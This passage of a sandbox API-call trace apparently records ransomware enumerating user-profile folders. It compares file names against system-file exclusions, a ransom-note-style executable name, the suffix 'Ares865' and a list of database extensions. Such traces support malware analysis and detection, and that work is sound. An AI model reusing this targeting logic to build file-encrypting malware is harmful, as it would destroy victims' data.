[0040.362] lstrcmpiW (lpString1="OG1", lpString2="abs") returned 1 [0040.362] lstrlenW (lpString="abx") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="abx") returned 1 [0040.363] lstrlenW (lpString="accdb") returned 5 [0040.363] lstrcmpiW (lpString1=".LOG1", lpString2="accdb") returned -1 [0040.363] lstrlenW (lpString="accdc") returned 5 [0040.363] lstrcmpiW (lpString1=".LOG1", lpString2="accdc") returned -1 [0040.363] lstrlenW (lpString="accde") returned 5 [0040.363] lstrcmpiW (lpString1=".LOG1", lpString2="accde") returned -1 [0040.363] lstrlenW (lpString="accdr") returned 5 [0040.363] lstrcmpiW (lpString1=".LOG1", lpString2="accdr") returned -1 [0040.363] lstrlenW (lpString="accdt") returned 5 [0040.363] lstrcmpiW (lpString1=".LOG1", lpString2="accdt") returned -1 [0040.363] lstrlenW (lpString="accdw") returned 5 [0040.363] lstrcmpiW (lpString1=".LOG1", lpString2="accdw") returned -1 [0040.363] lstrlenW (lpString="accft") returned 5 [0040.363] lstrcmpiW (lpString1=".LOG1", lpString2="accft") returned -1 [0040.363] lstrlenW (lpString="adb") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="adb") returned 1 [0040.363] lstrlenW (lpString="adb") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="adb") returned 1 [0040.363] lstrlenW (lpString="ade") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="ade") returned 1 [0040.363] lstrlenW (lpString="adf") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="adf") returned 1 [0040.363] lstrlenW (lpString="adn") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="adn") returned 1 [0040.363] lstrlenW (lpString="adp") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="adp") returned 1 [0040.363] lstrlenW (lpString="alf") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="alf") returned 1 [0040.363] lstrlenW (lpString="ask") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="ask") returned 1 [0040.363] lstrlenW (lpString="btr") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="btr") returned 1 [0040.363] lstrlenW (lpString="cat") returned 3 [0040.363] lstrcmpiW (lpString1="OG1", lpString2="cat") returned 1 [0040.363] lstrlenW (lpString="cdb") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="cdb") returned 1 [0040.364] lstrlenW (lpString="ckp") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="ckp") returned 1 [0040.364] lstrlenW (lpString="cma") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="cma") returned 1 [0040.364] lstrlenW (lpString="cpd") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="cpd") returned 1 [0040.364] lstrlenW (lpString="dacpac") returned 6 [0040.364] lstrcmpiW (lpString1="T.LOG1", lpString2="dacpac") returned 1 [0040.364] lstrlenW (lpString="dad") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="dad") returned 1 [0040.364] lstrlenW (lpString="dadiagrams") returned 10 [0040.364] lstrcmpiW (lpString1="R.DAT.LOG1", lpString2="dadiagrams") returned 1 [0040.364] lstrlenW (lpString="daschema") returned 8 [0040.364] lstrcmpiW (lpString1="DAT.LOG1", lpString2="daschema") returned 1 [0040.364] lstrlenW (lpString="db-journal") returned 10 [0040.364] lstrcmpiW (lpString1="R.DAT.LOG1", lpString2="db-journal") returned 1 [0040.364] lstrlenW (lpString="db-shm") returned 6 [0040.364] lstrcmpiW (lpString1="T.LOG1", lpString2="db-shm") returned 1 [0040.364] lstrlenW (lpString="db-wal") returned 6 [0040.364] lstrcmpiW (lpString1="T.LOG1", lpString2="db-wal") returned 1 [0040.364] lstrlenW (lpString="dbc") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="dbc") returned 1 [0040.364] lstrlenW (lpString="dbs") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="dbs") returned 1 [0040.364] lstrlenW (lpString="dbt") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="dbt") returned 1 [0040.364] lstrlenW (lpString="dbv") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="dbv") returned 1 [0040.364] lstrlenW (lpString="dbx") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="dbx") returned 1 [0040.364] lstrlenW (lpString="dcb") returned 3 [0040.364] lstrcmpiW (lpString1="OG1", lpString2="dcb") returned 1 [0040.365] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0040.365] lstrlenW (lpString="NTUSER.DAT.LOG2") returned 15 [0040.365] lstrlenW (lpString="Ares865") returned 7 [0040.365] lstrcmpiW (lpString1="AT.LOG2", lpString2="Ares865") returned 1 [0040.365] lstrlenW (lpString=".dll") returned 4 [0040.365] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".dll") returned 1 [0040.365] lstrlenW (lpString=".lnk") returned 4 [0040.365] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".lnk") returned 1 [0040.365] lstrlenW (lpString=".ini") returned 4 [0040.365] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".ini") returned 1 [0040.365] lstrlenW (lpString=".sys") returned 4 [0040.365] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2=".sys") returned 1 [0040.365] lstrlenW (lpString="NTUSER.DAT.LOG2") returned 15 [0040.366] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0040.366] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 55 [0040.366] lstrlenW (lpString="Ares865") returned 7 [0040.366] lstrcmpiW (lpString1=".TM.blf", lpString2="Ares865") returned -1 [0040.366] lstrlenW (lpString=".dll") returned 4 [0040.366] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".dll") returned 1 [0040.366] lstrlenW (lpString=".lnk") returned 4 [0040.366] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".lnk") returned 1 [0040.366] lstrlenW (lpString=".ini") returned 4 [0040.366] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".ini") returned 1 [0040.366] lstrlenW (lpString=".sys") returned 4 [0040.366] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".sys") returned 1 [0040.366] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 55 [0040.366] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0040.366] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0040.366] lstrlenW (lpString="Ares865") returned 7 [0040.366] lstrcmpiW (lpString1="rans-ms", lpString2="Ares865") returned 1 [0040.367] lstrlenW (lpString=".dll") returned 4 [0040.367] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".dll") returned 1 [0040.367] lstrlenW (lpString=".lnk") returned 4 [0040.367] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".lnk") returned 1 [0040.367] lstrlenW (lpString=".ini") returned 4 [0040.367] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".ini") returned 1 [0040.367] lstrlenW (lpString=".sys") returned 4 [0040.367] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".sys") returned 1 [0040.367] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0040.367] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0040.367] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0040.367] lstrlenW (lpString="Ares865") returned 7 [0040.367] lstrcmpiW (lpString1="rans-ms", lpString2="Ares865") returned 1 [0040.367] lstrlenW (lpString=".dll") returned 4 [0040.367] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".dll") returned 1 [0040.367] lstrlenW (lpString=".lnk") returned 4 [0040.367] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".lnk") returned 1 [0040.367] lstrlenW (lpString=".ini") returned 4 [0040.367] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".ini") returned 1 [0040.367] lstrlenW (lpString=".sys") returned 4 [0040.367] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".sys") returned 1 [0040.367] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0040.367] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0040.367] lstrlenW (lpString="ntuser.ini") returned 10 [0040.367] lstrlenW (lpString="Ares865") returned 7 [0040.367] lstrcmpiW (lpString1="ser.ini", lpString2="Ares865") returned 1 [0040.367] lstrlenW (lpString=".dll") returned 4 [0040.367] lstrcmpiW (lpString1="ntuser.ini", lpString2=".dll") returned 1 [0040.367] lstrlenW (lpString=".lnk") returned 4 [0040.367] lstrcmpiW (lpString1="ntuser.ini", lpString2=".lnk") returned 1 [0040.367] lstrlenW (lpString=".ini") returned 4 [0040.368] lstrcmpiW (lpString1="ntuser.ini", lpString2=".ini") returned 1 [0040.368] lstrlenW (lpString=".sys") returned 4 [0040.368] lstrcmpiW (lpString1="ntuser.ini", lpString2=".sys") returned 1 [0040.368] lstrlenW (lpString="ntuser.ini") returned 10 [0040.368] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0040.368] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Pictures", dwFileAttributes=0x10) returned 1 [0040.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0040.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3e) returned 0x2e6480 [0040.368] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0040.368] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0040.368] lstrcmpiW (lpString1="PrintHood", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.368] lstrcmpiW (lpString1="PrintHood", lpString2="aoldtz.exe") returned 1 [0040.368] lstrcmpiW (lpString1="PrintHood", lpString2=".") returned 1 [0040.368] lstrcmpiW (lpString1="PrintHood", lpString2="..") returned 1 [0040.368] lstrcmpiW (lpString1="PrintHood", lpString2="windows") returned -1 [0040.368] lstrcmpiW (lpString1="PrintHood", lpString2="bootmgr") returned 1 [0040.368] lstrcmpiW (lpString1="PrintHood", lpString2="temp") returned -1 [0040.368] lstrcmpiW (lpString1="PrintHood", lpString2="pagefile.sys") returned 1 [0040.368] lstrcmpiW (lpString1="PrintHood", lpString2="boot") returned 1 [0040.368] lstrcmpiW (lpString1="PrintHood", lpString2="ids.txt") returned 1 [0040.369] lstrcmpiW (lpString1="PrintHood", lpString2="ntuser.dat") returned 1 [0040.369] lstrcmpiW (lpString1="PrintHood", lpString2="perflogs") returned 1 [0040.369] lstrcmpiW (lpString1="PrintHood", lpString2="MSBuild") returned 1 [0040.369] lstrlenW (lpString="PrintHood") returned 9 [0040.369] lstrlenW (lpString="C:\\Users\\Default User\\Pictures") returned 30 [0040.369] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="PrintHood" | out: lpString1="PrintHood") returned="PrintHood" [0040.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0040.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e64c8 [0040.369] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0040.369] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="aoldtz.exe") returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="windows") returned -1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="bootmgr") returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="temp") returned -1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="pagefile.sys") returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="boot") returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="ids.txt") returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="ntuser.dat") returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="perflogs") returned 1 [0040.369] lstrcmpiW (lpString1="Recent", lpString2="MSBuild") returned 1 [0040.369] lstrlenW (lpString="Recent") returned 6 [0040.369] lstrlenW (lpString="C:\\Users\\Default User\\PrintHood") returned 31 [0040.369] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Recent" | out: lpString1="Recent") returned="Recent" [0040.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0040.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3a) returned 0x2e6510 [0040.369] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0040.369] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0040.369] lstrcmpiW (lpString1="Saved Games", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.369] lstrcmpiW (lpString1="Saved Games", lpString2="aoldtz.exe") returned 1 [0040.369] lstrcmpiW (lpString1="Saved Games", lpString2=".") returned 1 [0040.369] lstrcmpiW (lpString1="Saved Games", lpString2="..") returned 1 [0040.369] lstrcmpiW (lpString1="Saved Games", lpString2="windows") returned -1 [0040.370] lstrcmpiW (lpString1="Saved Games", lpString2="bootmgr") returned 1 [0040.370] lstrcmpiW (lpString1="Saved Games", lpString2="temp") returned -1 [0040.370] lstrcmpiW (lpString1="Saved Games", lpString2="pagefile.sys") returned 1 [0040.370] lstrcmpiW (lpString1="Saved Games", lpString2="boot") returned 1 [0040.370] lstrcmpiW (lpString1="Saved Games", lpString2="ids.txt") returned 1 [0040.370] lstrcmpiW (lpString1="Saved Games", lpString2="ntuser.dat") returned 1 [0040.370] lstrcmpiW (lpString1="Saved Games", lpString2="perflogs") returned 1 [0040.370] lstrcmpiW (lpString1="Saved Games", lpString2="MSBuild") returned 1 [0040.370] lstrlenW (lpString="Saved Games") returned 11 [0040.370] lstrlenW (lpString="C:\\Users\\Default User\\Recent") returned 28 [0040.370] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0040.370] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Saved Games", dwFileAttributes=0x10) returned 1 [0040.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0040.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x44) returned 0x2ee970 [0040.370] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0040.370] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0040.370] lstrcmpiW (lpString1="Searches", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.370] lstrcmpiW (lpString1="Searches", lpString2="aoldtz.exe") returned 1 [0040.370] lstrcmpiW (lpString1="Searches", lpString2=".") returned 1 [0040.370] lstrcmpiW (lpString1="Searches", lpString2="..") returned 1 [0040.370] lstrcmpiW (lpString1="Searches", lpString2="windows") returned -1 [0040.370] lstrcmpiW (lpString1="Searches", lpString2="bootmgr") returned 1 [0040.370] lstrcmpiW (lpString1="Searches", lpString2="temp") returned -1 [0040.371] lstrcmpiW (lpString1="Searches", lpString2="pagefile.sys") returned 1 [0040.371] lstrcmpiW (lpString1="Searches", lpString2="boot") returned 1 [0040.371] lstrcmpiW (lpString1="Searches", lpString2="ids.txt") returned 1 [0040.371] lstrcmpiW (lpString1="Searches", lpString2="ntuser.dat") returned 1 [0040.371] lstrcmpiW (lpString1="Searches", lpString2="perflogs") returned 1 [0040.371] lstrcmpiW (lpString1="Searches", lpString2="MSBuild") returned 1 [0040.371] lstrlenW (lpString="Searches") returned 8 [0040.371] lstrlenW (lpString="C:\\Users\\Default User\\Saved Games") returned 33 [0040.371] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0040.371] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Searches", dwFileAttributes=0x10) returned 1 [0040.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0040.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3e) returned 0x2e6558 [0040.371] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2448 | out: ListHead=0x2e77d0, ListEntry=0x2d2448) returned 0x2d2428 [0040.371] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0040.371] lstrcmpiW (lpString1="SendTo", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.371] lstrcmpiW (lpString1="SendTo", lpString2="aoldtz.exe") returned 1 [0040.371] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1 [0040.371] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1 [0040.371] lstrcmpiW (lpString1="SendTo", lpString2="windows") returned -1 [0040.371] lstrcmpiW (lpString1="SendTo", lpString2="bootmgr") returned 1 [0040.371] lstrcmpiW (lpString1="SendTo", lpString2="temp") returned -1 [0040.371] lstrcmpiW (lpString1="SendTo", lpString2="pagefile.sys") returned 1 [0040.371] lstrcmpiW (lpString1="SendTo", lpString2="boot") returned 1 [0040.372] lstrcmpiW (lpString1="SendTo", lpString2="ids.txt") returned 1 [0040.372] lstrcmpiW (lpString1="SendTo", lpString2="ntuser.dat") returned 1 [0040.372] lstrcmpiW (lpString1="SendTo", lpString2="perflogs") returned 1 [0040.372] lstrcmpiW (lpString1="SendTo", lpString2="MSBuild") returned 1 [0040.372] lstrlenW (lpString="SendTo") returned 6 [0040.372] lstrlenW (lpString="C:\\Users\\Default User\\Searches") returned 30 [0040.372] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="SendTo" | out: lpString1="SendTo") returned="SendTo" [0040.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2460 [0040.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3a) returned 0x2e65a0 [0040.372] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2468 | out: ListHead=0x2e77d0, ListEntry=0x2d2468) returned 0x2d2448 [0040.372] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="aoldtz.exe") returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="windows") returned -1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="bootmgr") returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="temp") returned -1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="pagefile.sys") returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="boot") returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="ids.txt") returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="ntuser.dat") returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="perflogs") returned 1 [0040.372] lstrcmpiW (lpString1="Start Menu", lpString2="MSBuild") returned 1 [0040.372] lstrlenW (lpString="Start Menu") returned 10 [0040.372] lstrlenW (lpString="C:\\Users\\Default User\\SendTo") returned 28 [0040.372] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Start Menu" | out: lpString1="Start Menu") returned="Start Menu" [0040.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2480 [0040.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x42) returned 0x2ee9c0 [0040.372] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2488 | out: ListHead=0x2e77d0, ListEntry=0x2d2488) returned 0x2d2468 [0040.372] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0040.372] lstrcmpiW (lpString1="Templates", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.372] lstrcmpiW (lpString1="Templates", lpString2="aoldtz.exe") returned 1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2="bootmgr") returned 1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2="temp") returned 1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2="pagefile.sys") returned 1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2="boot") returned 1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2="ids.txt") returned 1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2="ntuser.dat") returned 1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2="perflogs") returned 1 [0040.373] lstrcmpiW (lpString1="Templates", lpString2="MSBuild") returned 1 [0040.373] lstrlenW (lpString="Templates") returned 9 [0040.373] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu") returned 32 [0040.373] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Templates" | out: lpString1="Templates") returned="Templates" [0040.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24a0 [0040.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e65e8 [0040.373] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d24a8 | out: ListHead=0x2e77d0, ListEntry=0x2d24a8) returned 0x2d2488 [0040.373] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, 